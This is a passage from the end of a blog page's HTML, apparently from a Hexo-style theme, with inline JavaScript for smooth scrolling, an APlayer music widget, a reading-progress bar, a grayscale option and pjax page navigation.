        _backtopDom.addEventListener('click', () => backTopEvent());
        _commentDom.addEventListener('click', () => commentDomEvent());
        cateloguDom.appendChild(newDom);
      } else {
        commentDom.classList.add('hidden')
      }
    }
  }

  setOperateItem()
  const musics = JSON.parse(`[{"name":"任我行","artist":"eason","url":"https://y.qq.com/n/ryqq_v2/player","cover":"https://y.qq.com/n/ryqq_v2/player"}]`)
  const ap = new APlayer({
    container: document.querySelector('#aplayer'),
    audio: musics,
  })

  $(document).on('pjax:complete', function() {
    setOperateItem()
  })

  document.querySelector('.backtop').addEventListener('click', () => {
    backTopEvent();
  })
  const dom = document.querySelector('.turn-comment')
  dom && dom.addEventListener('click', () => {
    commentDomEvent();
  })

  function backTopEvent() {
    document.documentElement.scrollTo({
      top: 0,
      behavior: 'smooth'
    })
  }

  function commentDomEvent() {
    const commentDom = document.querySelector('.comments-intro')
    if (!commentDom) return
    const top = commentDom.offsetTop, height = commentDom.offsetHeight
    document.documentElement.scrollTo({
      top: top - 2 * height,
      behavior: 'smooth'
    })
  }
</script></div>
    </section>
  </div>
  <div id="progress" class="progress"></div>
  <div id="gray" class="gray"></div>

  <script>
    function initScroll () {
      document.addEventListener('scroll', () => {
        const doc = document.documentElement
        const scrollTop = doc.scrollTop
        const pageHeight = doc.offsetHeight
        const clientHeight = doc.clientHeight
        const ratio = scrollTop / (pageHeight - clientHeight)
        const progress = document.querySelector('#progress')
        const avatarImg = document.querySelector('.main-left--avatar')
        progress.style.width = (100 * ratio) + '%'
        avatarImg.style.transform = `rotate(${360 * ratio}deg)`
      })
    }

    const rootPath = "/"

    const checkAndSetArticlePageLayout = () => {
      const path = location.pathname.replace(rootPath, '');
      if (
        /^\/?\d{4}\/\d{2}\/\d{2}\/.*/.test(path) ||
        /^log\/.+/.test(path)
      ) {
        $('.main-container, .main-right, .main-right-wrapper').addClass('is-article')
      } else {
        $('.main-container, .main-right, .main-right-wrapper').removeClass('is-article')
      }
    }

    const gray = "none"
    const setGrayStyle = () => {
      if (gray === 'none') {
        return
      } else if (gray === 'index') {
        location.pathname === '/' ? $('#gray').show() : $('#gray').hide()
      } else if (gray === 'all') {
        $('#gray').show()
      }
    }
    setGrayStyle()


    window.onload = function () {
      checkAndSetArticlePageLayout()
      setTimeout(() => {
        $('#load').slideUp()
        $('#container').slideToggle()
        setTimeout(() => {
          initScroll();
        }, 500)
      }, 500)
    }
    
    let status = 0
    // 对所有链接跳转事件绑定pjax容器container
    $(document).pjax('a[target!=_blank]', '#main-container', {
      container: '#main-container',
      fragment: '#main-container',
      timeout: 8000
    })

    $(document).on('pjax:start', function() {
    })
    $(document).on('pjax:complete', function() {
      status = 0
      $('.main-container').addClass('to-up').on('animationend', function() {
        $(this).removeClass('to-up')
      })
      setGrayStyle()
      checkAndSetArticlePageLayout()
    })
    $(document).on('pjax:popstate', function() {
      status = -1
      checkAndSetArticlePageLayout()
    });
  </script>
</body>
</html>